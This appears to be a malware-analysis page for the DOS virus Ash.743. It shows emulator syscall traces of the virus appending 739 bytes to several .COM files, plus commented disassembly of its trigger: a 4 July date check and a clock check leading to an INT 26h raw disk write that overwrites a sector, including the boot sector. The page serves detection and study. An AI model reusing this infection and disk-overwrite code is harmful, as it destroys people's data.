Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.i

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:20.777302276Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:06:20.77981493Z 78 PC: 1419c | Find first file
2018-12-17T22:06:20.785497577Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:06:20.791714357Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.798333844Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.799588756Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.8020984Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.821683873Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.822918113Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.82927873Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.838877574Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.841466818Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:06:20.847733318Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.854693607Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.857779395Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.860348066Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.868320406Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.870902459Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.877494256Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.885884767Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.888891749Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:06:20.89514083Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.90161083Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.903257983Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.904966733Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.909867918Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.91132009Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.915355411Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.923217608Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.926075189Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:06:20.933657473Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.939745434Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.94153891Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.94429014Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.952368345Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.954285412Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.961034722Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.969046119Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.972338312Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:06:20.978689094Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.984815102Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.987076768Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.989592581Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.997251635Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.998706708Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.005529476Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.013651163Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.016596319Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:06:21.023097109Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.029636352Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:21.030941932Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.035644062Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:21.04400364Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:21.045227474Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.051582121Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.059620487Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.062060555Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:06:21.06886916Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.075766978Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:21.077450978Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.08106726Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:21.089476531Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:21.091039736Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.099012953Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.107704467Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.110325922Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:06:21.117023219Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.119484175Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.121137354Z 79 PC: 1419c | Find next file
; Trigger check reached right after the last "Find next file" row. The row below is the
; return from INT 21h AH=2Ah (logged as op 42, Get date): DL = day, DH = month.
; On 4 July, AX is zeroed and control jumps to 0x1426f; on any other date the clock is read
; and tested instead. The next logged call in this run is Get time at PC 14255, so the
; date test did not match here.
2018-12-17T22:06:21.123868508Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4  ; day == 4 ?
0x14245: jne 0x14251  ; no -> fall back to the clock test
0x14247: cmp dh, 7  ; month == 7 ?
0x1424a: jne 0x14251  ; no -> fall back to the clock test
0x1424c: xor ax, ax  ; date matched: AX = 0
0x1424e: jmp 0x1426f  ; 0x1426f (visible in the Get time rows) copies AX into DX ahead of INT 26h
0x14250: nop
0x14251: mov ah, 0x2c  ; INT 21h AH=2Ch, get time (logged as op 44)
0x14253: int 0x21  ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; sets ZF for a test past the end of this window
; Return from INT 21h AH=2Ch (logged as op 44, Get time): CH = hour, CL = minute,
; DH = second, DL = 1/100 s. When the minute is 0 and the hour is below 6, a sector number
; is derived from the clock and one sector is written to the default drive with INT 26h
; (DOS absolute disk write: AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = buffer). That raw write is the destructive payload; it bypasses the file system,
; so an INT 26h issued by a .COM program is a high-signal behaviour to alert on.
; The next logged call in this run is Get time at PC 14283, i.e. one of the two branches to
; 0x1427c was taken and the write was skipped.
2018-12-17T22:06:21.126209385Z 44 PC: 14255 | Get time 0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; clock-derived value == 0 ?
0x1426c: jne 0x1426f
0x1426e: inc ax  ; force it to 1, so the clock path never selects sector 0
0x1426f: mov dx, ax  ; DX = first sector to overwrite; also the target of the date check's jmp at 0x1424e, which arrives with AX = 0 (logical sector 0, the boot sector)
0x14271: mov cx, 1  ; one sector
0x14274: xor bx, bx  ; buffer offset 0, i.e. DS:0000
0x14276: mov ah, 0x19  ; INT 21h AH=19h, get default drive -> AL
0x14278: int 0x21
0x1427a: int 0x26  ; absolute disk write with the registers set up above
0x1427c: mov bx, 0x31a  ; target of the two bypass branches above; BX = 0x31a
; Return from a second Get time call (logged as op 44 at PC 14283). Only DH (seconds) is
; used, as a cheap pseudo-random index: it is reduced below the byte at [0x319], doubled,
; and added to BX (loaded with 0x31a at 0x1427c) to fetch a word that is then passed in DX
; to INT 21h AH=09h (print '$'-terminated string). The byte stored just before that string
; selects the follow-up action.
; NOTE(review): reading [0x319] as an entry count and 0x31a as a table of string pointers
; is inferred from how they are used here; their contents are not shown on this page.
2018-12-17T22:06:21.128660352Z 44 PC: 14283 | Get time 0x14283: inc dh  ; seconds + 1
0x14285: cmp dh, byte ptr [0x319]  ; index below the limit byte?
0x14289: jl 0x14291  ; yes (signed compare) -> use it
0x1428b: sub dh, byte ptr [0x319]  ; no -> subtract the limit and test again (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al  ; CL keeps a copy of the index; its use is outside this window
0x14295: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14296: shl ax, 1  ; index * 2: entries are words
0x14298: add bx, ax  ; BX = 0x31a + 2 * index
0x1429a: mov si, word ptr [bx]  ; SI = selected table entry
0x1429c: mov ch, byte ptr [si - 1]  ; CH = byte immediately before the address in SI
0x1429f: mov dx, si
0x142a1: mov ah, 9  ; INT 21h AH=09h, print string at DS:DX up to '$'
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20  ; CH == 0: terminate the program
0x142ac: cmp ch, 1  ; other CH values are handled past the end of this window
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:29.921761149Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:29.923392766Z 78 PC: 1419c | Find first file
2018-12-25T11:44:29.930132408Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:29.937300429Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:29.945115665Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:29.94667354Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.949493664Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:29.973488212Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:29.974976527Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.982177428Z 62 PC: 14190 | Close file
2018-12-25T11:44:29.992396089Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:29.996343796Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.003697605Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.010821319Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.014746426Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.017954904Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.02785509Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.032322332Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.039664632Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.258794773Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.262816267Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.267534488Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.272260344Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.274232356Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.277109854Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.673239823Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.675458176Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.681912457Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.723727357Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.728130658Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.73572696Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.750381304Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.752019275Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.758889658Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.768298772Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.770918921Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.779564738Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.78881103Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.792054137Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.801175978Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.809564902Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.811225251Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.81510607Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.824978282Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.826414358Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.834144787Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.846147216Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.849535721Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.85729674Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.86612353Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.868157542Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.871577765Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.882311549Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.885050837Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.893343938Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.914291522Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.916583914Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.922865927Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.929129093Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.930688123Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.934781316Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.943135014Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.944932642Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.952251903Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.961379035Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.966405646Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.987019987Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.990020814Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.994594125Z 79 PC: 1419c | Find next file (See above)
; Trigger check reached right after the last "Find next file" row. The row below is the
; return from INT 21h AH=2Ah (logged as op 42, Get date): DL = day, DH = month.
; On 4 July, AX is zeroed and control jumps to 0x1426f; on any other date the clock is read
; and tested instead. The next logged call in this run is Get time at PC 14255, so the
; date test did not match here.
2018-12-25T11:44:30.997330132Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4  ; day == 4 ?
0x14245: jne 0x14251  ; no -> fall back to the clock test
0x14247: cmp dh, 7  ; month == 7 ?
0x1424a: jne 0x14251  ; no -> fall back to the clock test
0x1424c: xor ax, ax  ; date matched: AX = 0
0x1424e: jmp 0x1426f  ; 0x1426f (visible in the Get time rows) copies AX into DX ahead of INT 26h
0x14250: nop
0x14251: mov ah, 0x2c  ; INT 21h AH=2Ch, get time (logged as op 44)
0x14253: int 0x21  ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; sets ZF for a test past the end of this window
; Return from INT 21h AH=2Ch (logged as op 44, Get time): CH = hour, CL = minute,
; DH = second, DL = 1/100 s. When the minute is 0 and the hour is below 6, a sector number
; is derived from the clock and one sector is written to the default drive with INT 26h
; (DOS absolute disk write: AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = buffer). That raw write is the destructive payload; it bypasses the file system,
; so an INT 26h issued by a .COM program is a high-signal behaviour to alert on.
; The row after this fragment (op 25, Get default drive, PC 1427a) shows that this run
; reached the write path: 0x1427a is the INT 26h instruction itself.
2018-12-25T11:44:30.999780107Z 44 PC: 14255 | Get time 0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; clock-derived value == 0 ?
0x1426c: jne 0x1426f
0x1426e: inc ax  ; force it to 1, so the clock path never selects sector 0
0x1426f: mov dx, ax  ; DX = first sector to overwrite; also the target of the date check's jmp at 0x1424e, which arrives with AX = 0 (logical sector 0, the boot sector)
0x14271: mov cx, 1  ; one sector
0x14274: xor bx, bx  ; buffer offset 0, i.e. DS:0000
0x14276: mov ah, 0x19  ; INT 21h AH=19h, get default drive -> AL
0x14278: int 0x21
0x1427a: int 0x26  ; absolute disk write with the registers set up above
0x1427c: mov bx, 0x31a  ; target of the two bypass branches above; BX = 0x31a
2018-12-25T11:44:31.00295835Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:29.920183078Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:29.922010831Z 78 PC: 1419c | Find first file
2018-12-25T11:44:29.928858388Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:29.936087513Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:29.944753674Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:29.946574374Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.949507369Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:29.973435492Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:29.975118436Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.982433491Z 62 PC: 14190 | Close file
2018-12-25T11:44:29.992156882Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:29.995479762Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.002920526Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.01053446Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.012558684Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.015511778Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.024603387Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.026194964Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.033847039Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.043393624Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.047814443Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.054970565Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.061923516Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.063931019Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.0669461Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.253353187Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.255756829Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.263964919Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.673782835Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.678332768Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.683639519Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.691149611Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.692835237Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.69629085Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.723954277Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.726068672Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.735128808Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.744710209Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.747879207Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.756719796Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.764553364Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.766474639Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.770740977Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.779600686Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.781148681Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.788761784Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.796027272Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.79862701Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.805015127Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.810087472Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.811302964Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.813538456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.820529865Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.822402635Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.827412383Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.834743702Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.837421631Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.845324345Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.853615683Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.855681052Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.859215688Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.868565923Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.869760054Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.875791171Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.887105158Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.890492212Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.897806186Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.901094347Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.903958668Z 79 PC: 1419c | Find next file (See above)
; Trigger check reached right after the last "Find next file" row. The row below is the
; return from INT 21h AH=2Ah (logged as op 42, Get date): DL = day, DH = month.
; On 4 July, AX is zeroed and control jumps to 0x1426f; on any other date the clock is read
; and tested instead. The next logged call in this run is Get time at PC 14255, so the
; date test did not match here.
2018-12-25T11:44:30.906504375Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4  ; day == 4 ?
0x14245: jne 0x14251  ; no -> fall back to the clock test
0x14247: cmp dh, 7  ; month == 7 ?
0x1424a: jne 0x14251  ; no -> fall back to the clock test
0x1424c: xor ax, ax  ; date matched: AX = 0
0x1424e: jmp 0x1426f  ; 0x1426f (visible in the Get time rows) copies AX into DX ahead of INT 26h
0x14250: nop
0x14251: mov ah, 0x2c  ; INT 21h AH=2Ch, get time (logged as op 44)
0x14253: int 0x21  ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; sets ZF for a test past the end of this window
; Return from INT 21h AH=2Ch (logged as op 44, Get time): CH = hour, CL = minute,
; DH = second, DL = 1/100 s. When the minute is 0 and the hour is below 6, a sector number
; is derived from the clock and one sector is written to the default drive with INT 26h
; (DOS absolute disk write: AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = buffer). That raw write is the destructive payload; it bypasses the file system,
; so an INT 26h issued by a .COM program is a high-signal behaviour to alert on.
; The row after this fragment (op 25, Get default drive, PC 1427a) shows that this run
; reached the write path: 0x1427a is the INT 26h instruction itself.
2018-12-25T11:44:30.909160915Z 44 PC: 14255 | Get time 0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; clock-derived value == 0 ?
0x1426c: jne 0x1426f
0x1426e: inc ax  ; force it to 1, so the clock path never selects sector 0
0x1426f: mov dx, ax  ; DX = first sector to overwrite; also the target of the date check's jmp at 0x1424e, which arrives with AX = 0 (logical sector 0, the boot sector)
0x14271: mov cx, 1  ; one sector
0x14274: xor bx, bx  ; buffer offset 0, i.e. DS:0000
0x14276: mov ah, 0x19  ; INT 21h AH=19h, get default drive -> AL
0x14278: int 0x21
0x1427a: int 0x26  ; absolute disk write with the registers set up above
0x1427c: mov bx, 0x31a  ; target of the two bypass branches above; BX = 0x31a
2018-12-25T11:44:30.912495851Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:30.448306081Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:30.450363344Z 78 PC: 1419c | Find first file
2018-12-25T11:44:30.457270994Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:30.464521631Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:30.47258409Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:30.474113432Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
